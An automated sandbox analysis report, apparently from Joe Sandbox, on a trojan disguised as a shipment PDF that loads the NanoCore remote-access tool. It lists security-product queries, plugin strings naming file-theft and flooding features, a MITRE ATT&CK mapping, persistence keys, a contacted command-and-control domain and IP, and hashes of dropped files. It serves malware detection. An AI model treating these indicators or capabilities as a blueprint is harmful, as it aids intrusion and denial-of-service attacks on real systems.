Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Remote Access Functionality

Detected Nanocore Rat

Source: CasPol.exe, 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: CasPol.exe, 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: CasPol.exe, 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: CasPol.exe, 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: CasPol.exe, 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Native API	1 Scheduled Task/Job	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	5 System Information Discovery	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	112 Process Injection	11 Obfuscated Files or Information	Security Account Manager	231 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Scheduled Task/Job	Logon Script (Mac)	1 Scheduled Task/Job	1 DLL Side-Loading	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Remote Access Software	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	1 Registry Run Keys / Startup Folder	11 Masquerading	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	2 Non-Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	131 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	113 Application Layer Protocol	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 Time Based Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	112 Process Injection	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Time Based Evasion	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Hidden Files and Directories	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Original Shipment_Document.PDF.exe	32%	Virustotal		Browse
Original Shipment_Document.PDF.exe	22%	ReversingLabs	Win32.Trojan.Guloader

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\nsaB9E2.tmp\System.dll	1%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsaB9E2.tmp\System.dll	3%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\nsaB9E2.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsaB9E2.tmp\nsExec.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsaB9E2.tmp\nsExec.dll	4%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\nsaB9E2.tmp\nsExec.dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external	0%	Virustotal		Browse
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.179.174	true	false	high
tuk.linkpc.net	188.127.230.176	true	false	high
googlehosted.l.googleusercontent.com	142.250.181.225	true	false	high
doc-14-70-docs.googleusercontent.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-14-70-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bcmtj5ie1disn24fvm7mb2d8jibr4j1v/1659691950000/06422039211485589527/*/1RTjXzM3oLxMQRuQuQg9TR4kX_hPJtp2r?e=download&uuid=fa4270ed-3082-4e6e-8e77-e38f9ee0c1fd	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://doc-14-70-docs.googleusercontent.com/	CasPol.exe, 00000088.00000003.186565322060.0000000001202000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000088.00000003.186517811821.0000000001201000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000088.00000003.186208501547.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000088.00000003.185951314480.0000000001252000.00000004.00000020.00020000.00000000.sdmp	false		high
https://doc-14-70-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bcmtj5ie	CasPol.exe, 00000088.00000003.185946644468.000000000122A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000088.00000003.186208501547.00000000011FD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	Original Shipment_Document.PDF.exe, windows.exe.136.dr	false		high
http://google.com	CasPol.exe, 00000088.00000003.185986328993.000000001ED13000.00000004.00000800.00020000.00000000.sdmp	false		high
https://doc-14-70-docs.googleusercontent.com/%%doc-14-70-docs.googleusercontent.com	CasPol.exe, 00000088.00000003.185950717846.0000000001214000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000088.00000003.186208501547.00000000011FD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/	CasPol.exe, 00000088.00000003.186210437136.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/x~	CasPol.exe, 00000088.00000003.186210437136.00000000011CD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external	CasPol.exe, 00000088.00000003.185946644468.000000000122A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.181.225	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
188.127.230.176	tuk.linkpc.net	Russian Federation	56694	DHUBRU	false
142.250.179.174	drive.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	679174
Start date and time: 05/08/202211:30:23	2022-08-05 11:30:23 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 42s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Original Shipment_Document.PDF.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	154
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@192/15@92/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 29.8% (good quality ratio 29.4%) Quality average: 87.4% Quality standard deviation: 21.5%
HCA Information:	Successful, ratio: 96% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
TCP Packets have been reduced to 100
Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, wdcpalt.microsoft.com, client.wns.windows.com, ctldl.windowsupdate.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:32:56	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\windows.exe
11:32:59	Task Scheduler	Run new task: DSL Monitor path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe" s>$(Arg0)
11:32:59	API Interceptor	4090x Sleep call for process: CasPol.exe modified
11:33:04	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\windows.exe

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	20
Entropy (8bit):	3.6841837197791887
Encrypted:	false
SSDEEP:	3:QHXMKas:Q3Las
MD5:	B3AC9D09E3A47D5FD00C37E075A70ECB
SHA1:	AD14E6D0E07B00BD10D77A06D68841B20675680B
SHA-256:	7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
SHA-512:	09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
Malicious:	false
Preview:	1,"fusion","GAC",0..

C:\Users\user\AppData\Local\Temp\nsaB9E2.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Original Shipment_Document.PDF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.814115788739565
Encrypted:	false
SSDEEP:	192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5:	CFF85C549D536F651D4FB8387F1976F2
SHA1:	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256:	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512:	531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 1%, Browse Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsaB9E2.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\Original Shipment_Document.PDF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7168
Entropy (8bit):	5.298362543684714
Encrypted:	false
SSDEEP:	96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
MD5:	675C4948E1EFC929EDCABFE67148EDDD
SHA1:	F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
SHA-256:	1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
SHA-512:	61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 4%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\subfolder1\windows.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
File Type:	data
Category:	dropped
Size (bytes):	341696
Entropy (8bit):	6.715582122607077
Encrypted:	false
SSDEEP:	6144:KNeZc5FBkXpIwbmr2KEROaPdEY8mff3PgRsmq:KNRTr2KEROoT8mfH+q
MD5:	458455444C46D7E13BABA6869E0E8330
SHA1:	D62FF8C988EB65A078440FD186A65822CA7BCA2F
SHA-256:	5556540A27FC7046591CF885CB8240739F69F1651CC6823F9EB2B12AD094921B
SHA-512:	F7817258597D81969D69A895314F74E6C8BFCC93FC0B245372B46773AE535C880E5EA5BEC05E8741EC7860199FD4CCCC86F0AA012C47E77EE96090880232223B
Malicious:	false
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L....Oa.................f...*.......4............@.................................H8....@.......................................... .............../...............................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata...p...............................rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6DD1.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1319
Entropy (8bit):	5.131285242271578
